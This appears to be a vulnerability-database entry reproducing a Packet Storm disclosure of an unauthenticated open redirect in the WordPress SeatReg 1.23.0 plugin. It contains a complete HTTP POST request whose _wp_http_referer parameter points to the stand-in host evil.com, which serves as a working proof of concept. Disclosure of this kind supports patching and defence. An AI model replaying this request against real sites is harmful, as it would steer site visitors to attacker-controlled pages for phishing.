Lucene search
K

WordPress SeatReg 1.23.0 Open Redirect

🗓️ 01 Aug 2022 00:00:00Reported by Mariam TariqType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 348 Views

WordPress SeatReg 1.23.0 Open Redirect vulnerability description, example request, and PoC imag

Code
`# Exploit Title: WordPress Plugin ‘SeatReg’ - Unauthenticated Open  
Redirect  
# Date: 01-08-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/seatreg/  
# Version: 1.23.0  
# Tested on: Firefox  
# Contact me: [email protected]  
  
*#Description:*  
  
An Open Redirection is a vulnerability when a web application or server  
uses an unvalidated user-submitted link to redirect the user to a given  
website or page.  
  
*#Example of Burp Request *  
```  
POST /wp-admin/admin-post.php HTTP/1.1  
Host: website.com  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)  
Gecko/20100101 Firefox/103.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://website.com  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 185  
Origin: https://website.com  
Connection: close  
Cookie: {cookies_here}  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: Navigate  
Sec-Fetch-Site: same-origin  
  
new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com  
<https://evil.com>*&submit=Create+new+registration  
```  
*#PoC Image:*  
  
https://ibb.co/tCZWH0H  
https://ibb.co/5kh299z  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation